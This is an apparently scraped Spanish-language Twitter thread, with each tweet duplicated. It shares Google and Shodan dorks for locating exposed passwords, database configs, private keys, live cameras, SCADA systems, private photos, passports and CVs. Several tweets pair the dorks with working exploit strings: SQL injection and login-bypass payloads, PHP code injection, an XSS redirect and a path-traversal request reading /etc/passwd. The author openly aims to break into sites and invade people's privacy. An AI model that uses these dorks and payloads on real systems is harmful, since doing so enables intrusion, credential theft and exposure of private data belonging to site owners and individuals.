Vamos a usar este tweet para publicar #Dorks de todo tipo, empecemos con este:
inurl:wp-config.php intext:DB_PASSWORD -stackoverflow -wpbeginner -foro -forum -topic -blog -about -docs -articles
#CyberSecurity #dork #BugBounty
inurl:wp-config.php intext:DB_PASSWORD -stackoverflow -wpbeginner -foro -forum -topic -blog -about -docs -articles
#CyberSecurity #dork #BugBounty
Este me gusta mucho, es un #Exploit en dónde hacemos uso de un #Dork para encontrar cámaras por internet y conseguir credenciales de administración 🧐
Shodan:
title:"SIEMENS IP-Camera"
Credenciales:
cgi-bin/chklogin.cgi?file=config.ini
#CyberSecurity #hacked #bugbountytips
Shodan:
title:"SIEMENS IP-Camera"
Credenciales:
cgi-bin/chklogin.cgi?file=config.ini
#CyberSecurity #hacked #bugbountytips
Este es para encontrar dispositivos iCloud vulnerables, podemos ver todas las fotos 🧐🧐
intitle:"Index Of" intext:"iCloud Photos" OR intext:"My Photo Stream" OR intext:"Camera Roll"
*Nota: pueden modificar los parámetros otros resultados
#Cybersecurite #dork #bugbountytips
intitle:"Index Of" intext:"iCloud Photos" OR intext:"My Photo Stream" OR intext:"Camera Roll"
*Nota: pueden modificar los parámetros otros resultados
#Cybersecurite #dork #bugbountytips
Este también es muy bueno, demasiado diría yo. Vamos a buscar páginas creadas en Joomla y con vulnerabilidad sql inyection:
inurl:/plugins/editors/jckeditor/plugins/jtreelink
#hacked #CyberSecurity
#BugBounty
inurl:/plugins/editors/jckeditor/plugins/jtreelink
#hacked #CyberSecurity
#BugBounty
⬇️⬇️⬇️⬇️
Exploit:http://site/path//plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,(%27payload%27),NULL,NULL,NULL,NULL,NULL--%20aa
⬆️⬆️⬆️⬆️
Exploit:http://site/path//plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=%22%20UNION%20SELECT%20NULL,NULL,(%27payload%27),NULL,NULL,NULL,NULL,NULL--%20aa
⬆️⬆️⬆️⬆️
Este #Dork nos permite encontrar el archivo sftp-config.json el cual contiene las credenciales para acceder al servicio sftp, ftp o ftps:
intitle:"Index Of" intext:sftp-config.json
Que lo disfruten!!🤓🤓🤪
#cybersecurite #BugBounty #hacked #ftp
intitle:"Index Of" intext:sftp-config.json
Que lo disfruten!!🤓🤓🤪
#cybersecurite #BugBounty #hacked #ftp
Confidencial ❌
Vamos a encontrar documentos "confidenciales"
filetype:"xls | xlsx | doc | docx | ppt | pptx | pdf" site:gov "FOUO" | "NOFORN" | "Confidential"
#dork #cybersecurite
Vamos a encontrar documentos "confidenciales"
filetype:"xls | xlsx | doc | docx | ppt | pptx | pdf" site:gov "FOUO" | "NOFORN" | "Confidential"
#dork #cybersecurite
Ahora un dork de shodan muy conocido por muchas personas y si no lo conoces, te invito a que lo pruebes!
Con este simple dork, encontrarán ftp con credenciales por defecto:
port:21 214-ADMIN_LOGIN
#dork #shodan #CyberSecurity #Pentesting
Con este simple dork, encontrarán ftp con credenciales por defecto:
port:21 214-ADMIN_LOGIN
#dork #shodan #CyberSecurity #Pentesting
Vamos a sacar XSS🤓
El siguiente #dork nos permite encontrar el login de las paginas RUMPUS FTP Web File Manager. ya que este salió con la vulnerabilidad de inyección xss!
Google Dork: site:*.*.com "Web File Manager" inurl:?login=
Shodan Dork: Server: Rumpus
#xss #CyberSecurity
El siguiente #dork nos permite encontrar el login de las paginas RUMPUS FTP Web File Manager. ya que este salió con la vulnerabilidad de inyección xss!
Google Dork: site:*.*.com "Web File Manager" inurl:?login=
Shodan Dork: Server: Rumpus
#xss #CyberSecurity
Este nos permite encontrar usuarios y claves de administradores, para modificar la web y se ven directamente en Google, sin necesidad de entrar en la página 🤓
ext:pwd inurl:(service | authors | administrators | users) “# -FrontPage-“ -github
#dork #bugbountytip
#cybersecurity
ext:pwd inurl:(service | authors | administrators | users) “# -FrontPage-“ -github
#dork #bugbountytip
#cybersecurity
Un regalo de navidad!!! vamos a buscar paginas vulnerables a sql injection!
Dork: Design & Developed By: 82webmaster
payload:
contect.php?Id=-1+union+select+1+--+
#CyberSecurity #bugbounty #hacked #sql
Dork: Design & Developed By: 82webmaster
payload:
contect.php?Id=-1+union+select+1+--+
#CyberSecurity #bugbounty #hacked #sql
Este #Dork nos permite encontrar el archivo db.conf, en dónde se encuentra información relacionada con la base de datos, tal como, usuario y contraseña.
intitle:"index of" "db.conf"
#cybersecurity #Pentesting #hacked
intitle:"index of" "db.conf"
#cybersecurity #Pentesting #hacked
El siguiente #Dork nos permite encontrar directamente el archivo parameters.yml, el cual, contiene la información de bases de datos, usuarios y contraseñas:
"database_password" filetype:yml "config/parameters.yml
#cybersecurity #Hacking
"database_password" filetype:yml "config/parameters.yml
#cybersecurity #Hacking
vamos a encontrar paginas vulnerables a xss injection y html injection explotando el plugin "UserPro", mas específicamente, su libreria de instagram.
intitle:"Index of" intitle:"UserPro" -uploads
#Dork #CyberSecurity #hacked ⬇️
intitle:"Index of" intitle:"UserPro" -uploads
#Dork #CyberSecurity #hacked ⬇️
cuando tengamos vista la pagina, usamos este exploit:
wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=<PAYLOAD>
y listo....
wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=<PAYLOAD>
y listo....
Ahora les comparto uno de mis favoritos de todos los tiempos! como un regalo de año nuevo🥳
"Powered by Virtual Radar Server" inurl:/VirtualRadar/
Este nos permite encontrar vuelos en tiempo real🤫
#dork #CyberSecurity #hacked
no me hago responsable de lo que hagan desde aquí
"Powered by Virtual Radar Server" inurl:/VirtualRadar/
Este nos permite encontrar vuelos en tiempo real🤫
#dork #CyberSecurity #hacked
no me hago responsable de lo que hagan desde aquí
#dorks para encontrar cámaras
inurl:/sample/LvAppl/lvappl.htm
allinurl:control/multiview
intitle:"Live View / – AXIS"
inurl:ViewerFrame?Mode=Refresh
intitle:snc-rz30 inurl:home/
intitle:liveapplet inurl:LvAppl
inurl:\view\index.shtml
inurl:CgiStart?page=Single
#cybersecurity
inurl:/sample/LvAppl/lvappl.htm
allinurl:control/multiview
intitle:"Live View / – AXIS"
inurl:ViewerFrame?Mode=Refresh
intitle:snc-rz30 inurl:home/
intitle:liveapplet inurl:LvAppl
inurl:\view\index.shtml
inurl:CgiStart?page=Single
#cybersecurity
Google #dorks para encontrar sistemas SCADA
intitle:”Miniweb Start Page”
inurl:”Portal/Portal.mwsl”
#scada #Pentesting
#hacked
intitle:”Miniweb Start Page”
inurl:”Portal/Portal.mwsl”
#scada #Pentesting
#hacked
#Dork para encontrar páginas vulnerables a #rce
>inurl:/webboard/index.php?category=
Pueden usar phpinfo:
${%40phpinfo()}
Ejemplo de Exploit:
/webboard/index.php?category=${@phpinfo()}webboard&page=&sequence=&listpage=
#cybersecurity #hack #bugbountytips
>inurl:/webboard/index.php?category=
Pueden usar phpinfo:
${%40phpinfo()}
Ejemplo de Exploit:
/webboard/index.php?category=${@phpinfo()}webboard&page=&sequence=&listpage=
#cybersecurity #hack #bugbountytips
#Dork para encontrar sistemas jboss y testear si son vulnerables:
Shodan:
Server: Apache-Coyote/1.1 Tomcat-5.5
Google:
inurl:"8080/jmx-console"
Para verificar si son vulnerables usen:
github.com
#Cybersecurite #hack #Pentesting
Shodan:
Server: Apache-Coyote/1.1 Tomcat-5.5
Google:
inurl:"8080/jmx-console"
Para verificar si son vulnerables usen:
github.com
#Cybersecurite #hack #Pentesting
#Dork para encontrar sitios creados en #WordPress y con el tema #Fanzone 3.1, el cual es vulnerables a sql inyección.
Dork:Built with WordPress and WP FanZone site:ca
#Exploit y parámetro vulnerable:
/weeklySchedule.php?schoolid=&date=ALL&leagueid=&divisionid=[SQL Injection]
Dork:Built with WordPress and WP FanZone site:ca
#Exploit y parámetro vulnerable:
/weeklySchedule.php?schoolid=&date=ALL&leagueid=&divisionid=[SQL Injection]
Vamos a encontrar el directorio /root/ en diferentes páginas web.
En la mayoría de los resultados pueden acceder hasta a los archivos:
/etc/passwd
/etc/shadow
para eso vamos a usar este #Dork
inurl:/sym/root/ intitle:index.of
#Cybersecurite
#pentesting #bugbountytips
En la mayoría de los resultados pueden acceder hasta a los archivos:
/etc/passwd
/etc/shadow
para eso vamos a usar este #Dork
inurl:/sym/root/ intitle:index.of
#Cybersecurite
#pentesting #bugbountytips
De una simple alerta hasta un deface 💪
IceWarp WebMail vulnerable a xss
#Dork inurl:/webmail/ intext:Powered by IceWarp Server
Parametro vulenable: color
Solo agreguen el parámetro en la página"
pagina.com<payload>
#xss #hacked #cybersecurity #bugbounty
IceWarp WebMail vulnerable a xss
#Dork inurl:/webmail/ intext:Powered by IceWarp Server
Parametro vulenable: color
Solo agreguen el parámetro en la página"
pagina.com<payload>
#xss #hacked #cybersecurity #bugbounty
Vamos a buscar servidores web vulnerables que nos permiten acceder a la la ruta /proc/self/cwd directamente desde el navegador
inurl:/proc/self/cwd
#dork #CyberSecurity #hacked
inurl:/proc/self/cwd
#dork #CyberSecurity #hacked
Uno más, vamos a buscar archivos que contienen contraseñas 🤓
intitle:"index of" share.passwd OR cloud.passwd OR ftp.passwd -public
#Dork #cybersecurity #Pentesting #bugbountytips
intitle:"index of" share.passwd OR cloud.passwd OR ftp.passwd -public
#Dork #cybersecurity #Pentesting #bugbountytips
Este #Dork nos dejará encontrar bases de datos de Microsoft acces, con el cual, podemos recolectar muy buena información:
accdb OR accde intitle:"index of" -pub -google -books
#cybersecurity #Database #Microsoft #bugbountytips
accdb OR accde intitle:"index of" -pub -google -books
#cybersecurity #Database #Microsoft #bugbountytips
Vamos a entrar a los chat logs de varias páginas. No es muy útil pero es interesante 😆
#Dork intitle:"index of" "sms.log"
[Originator] => _Y000!_
[Destination] => todos_ustedes
[Message] => Feliz hacking
#hacking #CyberSecurity
#Dork intitle:"index of" "sms.log"
[Originator] => _Y000!_
[Destination] => todos_ustedes
[Message] => Feliz hacking
#hacking #CyberSecurity
Con este #Dork vamos a buscar archivos .env, los cuales se encuentran páginas web basadas en #laravel.
Este contiene información como, nombres de usuario, contraseña, además de toda la información relacionada con la base de datos.
filetype:env intext:APP_NAME
#cybersecurity
Este contiene información como, nombres de usuario, contraseña, además de toda la información relacionada con la base de datos.
filetype:env intext:APP_NAME
#cybersecurity
#dork para encontrar nombres de usuario y contraseña
intitle:"index.of" intext:"pass.txt"
intitle:"index.of" intext:"pass.txt"
Este es un #Dork multi-usos por así decirlo, ya que nos permite encontrar paginas vulnerables a:
-inyección xss
-inyección sql
-open redirect
inurl:"mobile/produit.php?titlefamille=
#payload:
"><svg/onload=document.location.href="pagina">
#CyberSecurity #Hacking #hacked
-inyección xss
-inyección sql
-open redirect
inurl:"mobile/produit.php?titlefamille=
#payload:
"><svg/onload=document.location.href="pagina">
#CyberSecurity #Hacking #hacked
Jaja un pequeño error con las fotos, mandé la misma 3 veces, error de novato
El siguiente #dork nos permite encontrar información sensible para los servidores, ya sea, nombre de la base de datos, usuario y contraseña.
intitle:"index of" "env.bak"
#hacking #CyberSecurity #hacker
intitle:"index of" "env.bak"
#hacking #CyberSecurity #hacker
Este #Dork nos permite encontrar archivos de base de datos.
intitle: index of "*db.tar.gz"
#CyberSecurity #Linux
intitle: index of "*db.tar.gz"
#CyberSecurity #Linux
#Dork para encontrar paginas vulnerables a #xss
Este ataca una #vulnerabilidad de un tema de #wordpress, el cual se llama: Fruitful
intext:"Fruitful theme by fruitfulcode Powered by: WordPress" intext:"Comment" intext:"Leave a Reply"
#CyberSecurity #hacked #bugbountytips
Este ataca una #vulnerabilidad de un tema de #wordpress, el cual se llama: Fruitful
intext:"Fruitful theme by fruitfulcode Powered by: WordPress" intext:"Comment" intext:"Leave a Reply"
#CyberSecurity #hacked #bugbountytips
#Dork para encontrar servidores haciendo uso de JBoss, el cual pueden explotar
intitle:"Welcome to JBoss"
#cybersecurity #hacked #Pentesting
intitle:"Welcome to JBoss"
#cybersecurity #hacked #Pentesting
Este #Dork ya ha sido reparado en muchos buscadores.
Ya sea:
Google
Duckduckgo
Yandex
Pero si buscan bien, pueden encontrar resultados aún
Últimamente #WhatsApp dejó libres los links de invitación para unirse a los grupos, muchas gracias a @JordanWildon y @wongmjane por la info.
Ya sea:
Duckduckgo
Yandex
Pero si buscan bien, pueden encontrar resultados aún
Últimamente #WhatsApp dejó libres los links de invitación para unirse a los grupos, muchas gracias a @JordanWildon y @wongmjane por la info.
#CMS Irani "Rosependar" vulnerable a sql inyection
#Dork:intext:"Powered By RoseCms" inurl:sec=
🔴Al encontrar las páginas, noten que los parámetros vulnerables son: sec y cat
🔴El index se encuentra en la siguiente dirección: /index.php?page=major/19
#cybersecurity #Hacked
#Dork:intext:"Powered By RoseCms" inurl:sec=
🔴Al encontrar las páginas, noten que los parámetros vulnerables son: sec y cat
🔴El index se encuentra en la siguiente dirección: /index.php?page=major/19
#cybersecurity #Hacked
La llave privada es una especie de clave que sólo debe poseer la persona asignada para el manejo de información importante.
Con este #dork vamos a encontrar claves privadas sueltas por internet
intitle:"index of" /"privatekey.txt" OR "private key.txt"
#cybersecurity #bugbounty
Con este #dork vamos a encontrar claves privadas sueltas por internet
intitle:"index of" /"privatekey.txt" OR "private key.txt"
#cybersecurity #bugbounty
El siguiente #Dork es para encontrar páginas vulnerables a Directory traversal:
inurl:"laravel-filemanager?type=Files" -site:github.com -site:github.io
En este caso, la página vulnerable nos permite descargar el archivo passwd
#CyberSecurity #hacked
inurl:"laravel-filemanager?type=Files" -site:github.com -site:github.io
En este caso, la página vulnerable nos permite descargar el archivo passwd
#CyberSecurity #hacked
Una vez en lapágina, vamos a la ruta:
/laravel-filemanager/download?working_dir=
Y añadimos el siguiente #payload :
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd
/laravel-filemanager/download?working_dir=
Y añadimos el siguiente #payload :
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd
Los siguientes #Dorks son para encontrar el archivo "sftp_config.json", el cual contiene los opciones del ftp
⭕index of sftp-config.json
⭕index of sftp-config.json intext:2020
⭕intitle:index of intext:sftp-config.json
⭕index of js/sftp-config.json
#dork #cybersecurity
⭕index of sftp-config.json
⭕index of sftp-config.json intext:2020
⭕intitle:index of intext:sftp-config.json
⭕index of js/sftp-config.json
#dork #cybersecurity
#dorks para encontrar cámaras por internet 👨🏻💻
inurl:"MultiCameraFrame?Mode=Motion
"VB Viewer" inurl:/viewer/live/ja/live.html
#cybersecurity #infosec
inurl:"MultiCameraFrame?Mode=Motion
"VB Viewer" inurl:/viewer/live/ja/live.html
#cybersecurity #infosec
Dorks para encontrar archivos con contraseñas:
intitle:"Index of" dbconnect.inc
"enable password" ext:cfg -git -cisco.com
password console-password ext:cfg -git
intext:authentication set encrypted-password ext:cfg
#dork #password
intitle:"Index of" dbconnect.inc
"enable password" ext:cfg -git -cisco.com
password console-password ext:cfg -git
intext:authentication set encrypted-password ext:cfg
#dork #password
Dork para encontrar páginas vulnerables a sql login bypass
intext:"Created by: Worldviewer.in. "
Usen este payload en usuario y contraseña
'=' 'OR'
#bypass #sql #payloads #payload
intext:"Created by: Worldviewer.in. "
Usen este payload en usuario y contraseña
'=' 'OR'
#bypass #sql #payloads #payload
WordPress Grimag Themes 1.2.5
Vamos a encontrar páginas creadas en WordPress vulnerables a redirección abierta, eso gracias el tema Grimag que es vulnerable.
inurl:/wp-content/themes/Grimag/
El parámetro vulenable es:
Go.php
#dork #Cybersecurite #cybersecurity
Vamos a encontrar páginas creadas en WordPress vulnerables a redirección abierta, eso gracias el tema Grimag que es vulnerable.
inurl:/wp-content/themes/Grimag/
El parámetro vulenable es:
Go.php
#dork #Cybersecurite #cybersecurity
Vamos a romper la privacidad de las personas encontrando imágenes privadas alojadas en la carpeta dcim.
intitle:"Index Of" intext:"dcim"
#dork #infosec #cybersecurity #private #Hacked
intitle:"Index Of" intext:"dcim"
#dork #infosec #cybersecurity #private #Hacked
Cómo sabemos, podemos encontrar de todo con los #dorks, en este caso le toca a los pasaportes.
index of /wp-content/uploads/passport
#CyberSecurity #infosec #OSINT
index of /wp-content/uploads/passport
#CyberSecurity #infosec #OSINT
Los curriculum vitae son muuuy importantes para los trabajos ya que estos dan la información necesaria a la empresa, pero... Esto en otras manos?
#dork para encontrar currículum vitae
site:*.*.* “teléfono * * *” “dirección *” “e-mail” intitle:”curriculum vitae”
#CyberSecurity
#dork para encontrar currículum vitae
site:*.*.* “teléfono * * *” “dirección *” “e-mail” intitle:”curriculum vitae”
#CyberSecurity
Dorks para encontrar contraseñas de diferentes servicios:
intitle:"index of" "ssh.yml"
intitle:"index of" "database-old.yml"
intitle:"index of" "configuration.yml"
intitle:"index of" "database.yml"
intitle:"index of" "ftp.yml"
#dork #bugbountytip
#cybersecurity
intitle:"index of" "ssh.yml"
intitle:"index of" "database-old.yml"
intitle:"index of" "configuration.yml"
intitle:"index of" "database.yml"
intitle:"index of" "ftp.yml"
#dork #bugbountytip
#cybersecurity
Dorks para encontrar páginas vulnerables a Local File Inclusion
intext:COPYRIGHT © 宜蘭民宿旅遊網
intext:COPYRIGHT © 花蓮民宿旅遊網
intext:"COPYRIGHT" inurl:?page=regulation.php
Vuln:
/Index.php?page=[lfi]
#dork #lfi #cybersecurity
intext:COPYRIGHT © 宜蘭民宿旅遊網
intext:COPYRIGHT © 花蓮民宿旅遊網
intext:"COPYRIGHT" inurl:?page=regulation.php
Vuln:
/Index.php?page=[lfi]
#dork #lfi #cybersecurity
Dork para encontrar directorios sensibles en un servidor (HOME)
inurl:home/000~ROOT~000/
#dork #CyberSecurity
inurl:home/000~ROOT~000/
#dork #CyberSecurity
جاري تحميل الاقتراحات...